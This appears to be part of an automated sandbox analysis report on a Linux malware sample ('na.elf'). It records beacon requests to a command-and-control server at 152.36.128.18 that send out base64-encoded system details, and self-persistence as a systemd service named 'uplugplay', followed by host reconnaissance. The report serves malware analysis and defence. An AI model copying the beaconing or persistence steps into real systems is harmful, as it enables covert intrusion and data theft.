Mar 31, 2025 10:53:09.728756905 CEST	58304	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:09.918081045 CEST	80	58304	152.36.128.18	192.168.2.23
Mar 31, 2025 10:53:09.953062057 CEST	80	58304	152.36.128.18	192.168.2.23
Mar 31, 2025 10:53:09.953180075 CEST	58304	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:09.953571081 CEST	58304	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:10.010952950 CEST	80	58304	152.36.128.18	192.168.2.23
Mar 31, 2025 10:53:10.011013031 CEST	58304	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:10.102202892 CEST	80	58304	152.36.128.18	192.168.2.23
Mar 31, 2025 10:53:10.223268986 CEST	58306	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:10.370865107 CEST	80	58306	152.36.128.18	192.168.2.23
Mar 31, 2025 10:53:10.371103048 CEST	58306	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:10.372870922 CEST	58306	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:10.570959091 CEST	80	58306	152.36.128.18	192.168.2.23
Mar 31, 2025 10:53:10.612217903 CEST	80	58306	152.36.128.18	192.168.2.23
Mar 31, 2025 10:53:10.612353086 CEST	58306	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:10.612883091 CEST	58306	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:10.663160086 CEST	80	58306	152.36.128.18	192.168.2.23
Mar 31, 2025 10:53:10.663255930 CEST	58306	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:10.758075953 CEST	80	58306	152.36.128.18	192.168.2.23
Mar 31, 2025 10:53:11.492315054 CEST	43928	443	192.168.2.23	91.189.91.42
Mar 31, 2025 10:53:23.778506041 CEST	42836	443	192.168.2.23	91.189.91.43
Mar 31, 2025 10:53:29.921622038 CEST	42516	80	192.168.2.23	109.202.202.202
Mar 31, 2025 10:53:52.446548939 CEST	43928	443	192.168.2.23	91.189.91.42

HTTP Request Dependency Graph

152.36.128.18

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	58304	152.36.128.18	80

Timestamp	Bytes transferred	Direction	Data
Mar 31, 2025 10:53:09.728756905 CEST	75	OUT	GET /cgi-bin/p.cgi?r=4&i=213U6SANKFY6LBV1 HTTP/1.0 Host: 152.36.128.18
Mar 31, 2025 10:53:09.953062057 CEST	179	IN	HTTP/1.1 200 OK Date: Mon, 31 Mar 2025 08:53:09 GMT Server: Apache/2.4.41 (Win64) Content-Length: 7 Connection: close Content-Type: text/html; charset=windows-1251 Data Raw: 73 79 73 69 6e 66 6f Data Ascii: sysinfo

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.23	58306	152.36.128.18	80

Timestamp	Bytes transferred	Direction	Data
Mar 31, 2025 10:53:10.372870922 CEST	751	OUT	GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDAzOjUzOjA5IHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAxLjc2LCAwLjg0LCAwLjM0fDE3NDM0MTExODkNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=213U6SANKFY6LBV1&h=galassia&enckey=Q9+c0mlQRt8dIAQ/YFGImVwcfDVs1ROy5aruhr0qjaI2YBRXFl830T3sU2Y/YBj0K3Q62hoRjN3dzhq0PFRt7U4iiPAYPw3pxx633dcPuTnVjsE908sStaVY+PXgMhy9JnKrPyj1z7cqV8xRMSKa3+1FRhk0oZe+5iPm5FUDFwI= HTTP/1.0 Host: 152.36.128.18
Mar 31, 2025 10:53:10.612217903 CEST	224	IN	HTTP/1.1 200 OK Date: Mon, 31 Mar 2025 08:53:10 GMT Server: Apache/2.4.41 (Win64) Content-Length: 3 Connection: close Content-Type: text/html; charset=windows-1251 Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a Data Ascii: ok!Content-type: text/html; charset=windows-1251

System Behavior

Analysis Process: na.elf PID: 6217, Parent PID: 6130

General

Start time (UTC):	08:52:48
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	/tmp/na.elf
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

File Activities

File Opened

File Deleted

File Read

File Written

Permission Modified

Process Activities

Process Forked

Thread Sleep

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: na.elf PID: 6220, Parent PID: 6217

General

Start time (UTC):	08:52:48
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6220, Parent PID: 6217

General

Start time (UTC):	08:52:48
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pgrep na.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6221, Parent PID: 6220

General

Start time (UTC):	08:52:48
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pgrep PID: 6221, Parent PID: 6220

General

Start time (UTC):	08:52:48
Start date (UTC):	31/03/2025
Path:	/usr/bin/pgrep
Arguments:	pgrep na.elf
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 6224, Parent PID: 6217

General

Start time (UTC):	08:52:49
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6224, Parent PID: 6217

General

Start time (UTC):	08:52:49
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pgrep uplugplay"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6225, Parent PID: 6224

General

Start time (UTC):	08:52:49
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pgrep PID: 6225, Parent PID: 6224

General

Start time (UTC):	08:52:50
Start date (UTC):	31/03/2025
Path:	/usr/bin/pgrep
Arguments:	pgrep uplugplay
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 6230, Parent PID: 6217

General

Start time (UTC):	08:52:51
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6230, Parent PID: 6217

General

Start time (UTC):	08:52:51
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pidof uplugplay"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6231, Parent PID: 6230

General

Start time (UTC):	08:52:51
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pidof PID: 6231, Parent PID: 6230

General

Start time (UTC):	08:52:51
Start date (UTC):	31/03/2025
Path:	/usr/bin/pidof
Arguments:	pidof uplugplay
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 6234, Parent PID: 6217

General

Start time (UTC):	08:52:52
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6234, Parent PID: 6217

General

Start time (UTC):	08:52:52
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pgrep upnpsetup"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6235, Parent PID: 6234

General

Start time (UTC):	08:52:52
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pgrep PID: 6235, Parent PID: 6234

General

Start time (UTC):	08:52:52
Start date (UTC):	31/03/2025
Path:	/usr/bin/pgrep
Arguments:	pgrep upnpsetup
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 6238, Parent PID: 6217

General

Start time (UTC):	08:52:54
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6238, Parent PID: 6217

General

Start time (UTC):	08:52:54
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pidof upnpsetup"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6239, Parent PID: 6238

General

Start time (UTC):	08:52:54
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pidof PID: 6239, Parent PID: 6238

General

Start time (UTC):	08:52:54
Start date (UTC):	31/03/2025
Path:	/usr/bin/pidof
Arguments:	pidof upnpsetup
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 6242, Parent PID: 6217

General

Start time (UTC):	08:52:56
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6242, Parent PID: 6217

General

Start time (UTC):	08:52:56
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl daemon-reload"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6243, Parent PID: 6242

General

Start time (UTC):	08:52:56
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemctl PID: 6243, Parent PID: 6242

General

Start time (UTC):	08:52:56
Start date (UTC):	31/03/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: na.elf PID: 6256, Parent PID: 6217

General

Start time (UTC):	08:52:57
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6256, Parent PID: 6217

General

Start time (UTC):	08:52:57
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl enable uplugplay.service"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6257, Parent PID: 6256

General

Start time (UTC):	08:52:57
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemctl PID: 6257, Parent PID: 6256

General

Start time (UTC):	08:52:57
Start date (UTC):	31/03/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl enable uplugplay.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: na.elf PID: 6262, Parent PID: 6217

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6262, Parent PID: 6217

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl start uplugplay.service"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6263, Parent PID: 6262

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemctl PID: 6263, Parent PID: 6262

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl start uplugplay.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: systemd PID: 6245, Parent PID: 6244

General

Start time (UTC):	08:52:56
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: snapd-env-generator PID: 6245, Parent PID: 6244

General

Start time (UTC):	08:52:56
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

File Activities

File Opened

File Read

File Written

Chronological Activities

Analysis Process: systemd PID: 6260, Parent PID: 6259

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: snapd-env-generator PID: 6260, Parent PID: 6259

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

File Activities

File Opened

File Read

File Written

Chronological Activities

Analysis Process: systemd PID: 6264, Parent PID: 1

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uplugplay PID: 6264, Parent PID: 1

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	/usr/sbin/uplugplay
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

File Activities

File Opened

Process Activities

Process Forked

Thread Sleep

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: uplugplay PID: 6267, Parent PID: 6264

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

File Activities

File Opened

Process Activities

Process Forked

Chronological Activities

Analysis Process: uplugplay PID: 6268, Parent PID: 6267

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6268, Parent PID: 6267

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "/usr/sbin/uplugplay -Dcomsvc"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6269, Parent PID: 6268

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uplugplay PID: 6269, Parent PID: 6268

General

Start time (UTC):	08:52:58
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	/usr/sbin/uplugplay -Dcomsvc
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

File Activities

File Opened

File Read

File Written

Process Activities

Process Forked

Thread Sleep

System Activities

Query System Information (uname)

Network Activities

Socket Listening

Socket Connecting

Chronological Activities

Analysis Process: uplugplay PID: 6273, Parent PID: 6269

General

Start time (UTC):	08:52:59
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6273, Parent PID: 6269

General

Start time (UTC):	08:52:59
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c hostnamectl
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6274, Parent PID: 6273

General

Start time (UTC):	08:52:59
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: hostnamectl PID: 6274, Parent PID: 6273

General

Start time (UTC):	08:52:59
Start date (UTC):	31/03/2025
Path:	/usr/bin/hostnamectl
Arguments:	hostnamectl
File size:	26848 bytes
MD5 hash:	b1245aa6d3c28b5d5fedb2d681d32eb9

File Activities

File Opened

File Read

Process Activities

Prctl Requested

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: uplugplay PID: 6413, Parent PID: 6269

General

Start time (UTC):	08:53:01
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6413, Parent PID: 6269

General

Start time (UTC):	08:53:01
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c uptime
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6414, Parent PID: 6413

General

Start time (UTC):	08:53:01
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uptime PID: 6414, Parent PID: 6413

General

Start time (UTC):	08:53:01
Start date (UTC):	31/03/2025
Path:	/usr/bin/uptime
Arguments:	uptime
File size:	14568 bytes
MD5 hash:	3ad70d8e33316ac713bf25c2ddf2fb14

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 6417, Parent PID: 6269

General

Start time (UTC):	08:53:02
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6417, Parent PID: 6269

General

Start time (UTC):	08:53:02
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "uname -a"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6418, Parent PID: 6417

General

Start time (UTC):	08:53:02
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uname PID: 6418, Parent PID: 6417

General

Start time (UTC):	08:53:02
Start date (UTC):	31/03/2025
Path:	/usr/bin/uname
Arguments:	uname -a
File size:	39288 bytes
MD5 hash:	4ac7c634c5bec95753c480e9d421dcc2

File Activities

File Opened

File Read

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: uplugplay PID: 6438, Parent PID: 6269

General

Start time (UTC):	08:53:08
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6438, Parent PID: 6269

General

Start time (UTC):	08:53:08
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c hostnamectl
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6439, Parent PID: 6438

General

Start time (UTC):	08:53:09
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: hostnamectl PID: 6439, Parent PID: 6438

General

Start time (UTC):	08:53:09
Start date (UTC):	31/03/2025
Path:	/usr/bin/hostnamectl
Arguments:	hostnamectl
File size:	26848 bytes
MD5 hash:	b1245aa6d3c28b5d5fedb2d681d32eb9

File Activities

File Opened

File Read

Process Activities

Prctl Requested

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: uplugplay PID: 6445, Parent PID: 6269

General

Start time (UTC):	08:53:09
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6445, Parent PID: 6269

General

Start time (UTC):	08:53:09
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c uptime
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6446, Parent PID: 6445

General

Start time (UTC):	08:53:09
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uptime PID: 6446, Parent PID: 6445

General

Start time (UTC):	08:53:09
Start date (UTC):	31/03/2025
Path:	/usr/bin/uptime
Arguments:	uptime
File size:	14568 bytes
MD5 hash:	3ad70d8e33316ac713bf25c2ddf2fb14

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 6449, Parent PID: 6269

General

Start time (UTC):	08:53:09
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	cb12d1dd62d556d8baa0d115e6d41083

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6449, Parent PID: 6269

General

Start time (UTC):	08:53:09
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "uname -a"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6450, Parent PID: 6449

General

Start time (UTC):	08:53:09
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uname PID: 6450, Parent PID: 6449

General

Start time (UTC):	08:53:09
Start date (UTC):	31/03/2025
Path:	/usr/bin/uname
Arguments:	uname -a
File size:	39288 bytes
MD5 hash:	4ac7c634c5bec95753c480e9d421dcc2

File Activities

File Opened

File Read

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: systemd PID: 6276, Parent PID: 1

General

Start time (UTC):	08:53:00
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemd-hostnamed PID: 6276, Parent PID: 1

General

Start time (UTC):	08:53:00
Start date (UTC):	31/03/2025
Path:	/lib/systemd/systemd-hostnamed
Arguments:	/lib/systemd/systemd-hostnamed
File size:	35040 bytes
MD5 hash:	2cc8a5576629a2d5bd98e49a4b8bef65

File Activities

File Opened

File Read

Process Activities

Prctl Requested

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 6423, Parent PID: 1

General

Start time (UTC):	08:53:06
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 6423, Parent PID: 1

General

Start time (UTC):	08:53:06
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	/usr/bin/gpg --version
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 6425, Parent PID: 1

General

Start time (UTC):	08:53:06
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 6425, Parent PID: 1

General

Start time (UTC):	08:53:06
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 6427, Parent PID: 1

General

Start time (UTC):	08:53:06
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 6427, Parent PID: 1

General

Start time (UTC):	08:53:06
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
